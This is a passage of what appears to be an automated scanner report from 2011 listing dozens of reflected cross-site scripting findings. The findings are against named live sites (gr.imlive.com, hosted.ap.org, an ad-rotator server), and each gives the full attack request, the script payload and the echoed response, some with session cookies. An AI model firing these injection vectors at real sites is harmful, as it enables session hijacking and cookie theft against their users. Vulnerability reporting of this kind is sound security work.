This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2b12e'-alert(1)-'11d097f86af=1 HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/?2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&iy=dallas&id=44&iu=1&vd=47dec44d-298a-4e64-82a7-f991aeebff7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
4.445. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ff7"><script>alert(1)</script>e0815795bf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?84ff7"><script>alert(1)</script>e0815795bf3=1 HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81248"><script>alert(1)</script>dd3960e35d8 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855e3"><script>alert(1)</script>7145c8255ab was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d7c5'onerror%3d'alert(1)'1cb395fc54c was submitted in the gotopage parameter. This input was echoed as 2d7c5'onerror='alert(1)'1cb395fc54c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2d7c5'onerror%3d'alert(1)'1cb395fc54c HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:30 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQRQRCTC=GAOPGJMAIPBIPMLIPIDNAHJF; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:31 GMT Connection: close Content-Length: 8306 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1c5"><script>alert(1)</script>6962831ce28 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
The value of the CN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18784"%3balert(1)//b6df280b1f1 was submitted in the CN parameter. This input was echoed as 18784";alert(1)//b6df280b1f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP70718784"%3balert(1)//b6df280b1f1&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Sat, 29 Jan 2011 04:49:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:49:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <title>Business - BostonHerald ...[SNIP]... <script type="text/javascript">
var apLink="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/indexreturns.html?CN=AP70718784";alert(1)//b6df280b1f1&Idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE";
The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c866d"><script>alert(1)</script>e14b1d4bb59 was submitted in the CN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707c866d"><script>alert(1)</script>e14b1d4bb59&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Sat, 29 Jan 2011 04:49:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:49:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71409
The value of the idx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9585c"%3balert(1)//dd20765be50 was submitted in the idx parameter. This input was echoed as 9585c";alert(1)//dd20765be50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=29585c"%3balert(1)//dd20765be50&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Sat, 29 Jan 2011 04:50:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:50:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <title>Business - BostonHerald ...[SNIP]... <script type="text/javascript">
var apLink="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/indexreturns.html?CN=AP707&Idx=29585c";alert(1)//dd20765be50&SITE=MABOH&SECTION=DJSP_COMPLETE";
The value of the idx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c63db"><script>alert(1)</script>5f8144f9788 was submitted in the idx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2c63db"><script>alert(1)</script>5f8144f9788&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Sat, 29 Jan 2011 04:50:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:50:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 71323
The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17227"><script>alert(1)</script>9990806bf60 was submitted in the CN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP70717227"><script>alert(1)</script>9990806bf60&ticker= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Sat, 29 Jan 2011 04:49:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:49:54 GMT Content-Length: 32723 Connection: close
The value of the ticker request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c61"><script>alert(1)</script>7231934c67 was submitted in the ticker parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61"><script>alert(1)</script>7231934c67 HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Sat, 29 Jan 2011 04:50:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:50:05 GMT Content-Length: 32582 Connection: close
The value of the CN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ca15'%3balert(1)//242f072a60e was submitted in the CN parameter. This input was echoed as 9ca15';alert(1)//242f072a60e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP7079ca15'%3balert(1)//242f072a60e&valid=NO&set=new&view=quote&ticker= HTTP/1.1 Host: hosted.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=MABOH; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html;charset=utf-8 Expires: Sat, 29 Jan 2011 04:50:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:50:13 GMT Content-Length: 25958 Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68108<script>alert(1)</script>2a6b507c2b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico68108<script>alert(1)</script>2a6b507c2b0 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X00631Sh00PZ
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 17:24:03 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /favicon.ico68108<script>alert(1)</script>2a6b507c2b0 not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb1f0<script>alert(1)</script>7dc5a16144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servleteb1f0<script>alert(1)</script>7dc5a16144/ajrotator/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:46:05 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servleteb1f0<script>alert(1)</script>7dc5a16144/ajrotator/ not found</pre> <BR>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70655<script>alert(1)</script>47968bcc251 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/ajrotator70655<script>alert(1)</script>47968bcc251/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:46:07 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator70655<script>alert(1)</script>47968bcc251/ not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27cbd<script>alert(1)</script>6907b2da62a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet27cbd<script>alert(1)</script>6907b2da62a/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:46:05 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet27cbd<script>alert(1)</script>6907b2da62a/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ not found</pre> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba19b<script>alert(1)</script>14c865a5c05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/ajrotatorba19b<script>alert(1)</script>14c865a5c05/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:46:05 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotatorba19b<script>alert(1)</script>14c865a5c05/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ not found</pre> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 392f3<script>alert(1)</script>219f978c563 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet392f3<script>alert(1)</script>219f978c563/ajrotator/63722/0/vj?z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:41:58 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet392f3<script>alert(1)</script>219f978c563/ajrotator/63722/0/vj not found</pre> <BR>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0304<script>alert(1)</script>eba54b6ea1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/ajrotatora0304<script>alert(1)</script>eba54b6ea1/63722/0/vj?z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:41:57 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotatora0304<script>alert(1)</script>eba54b6ea1/63722/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 16fb7<script>alert(1)</script>adc248a20be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet16fb7<script>alert(1)</script>adc248a20be/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:46:10 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet16fb7<script>alert(1)</script>adc248a20be/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ not found</pre> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b5ec<script>alert(1)</script>60ca2fa0c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/ajrotator4b5ec<script>alert(1)</script>60ca2fa0c6/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:46:10 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator4b5ec<script>alert(1)</script>60ca2fa0c6/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ not found</pre> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61456<script>alert(1)</script>bd4d5cb3b8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet61456<script>alert(1)</script>bd4d5cb3b8a/ajrotator/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:42:09 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet61456<script>alert(1)</script>bd4d5cb3b8a/ajrotator/63723/0/vj not found</pre> <BR>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab38f<script>alert(1)</script>fdc76c91cde was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
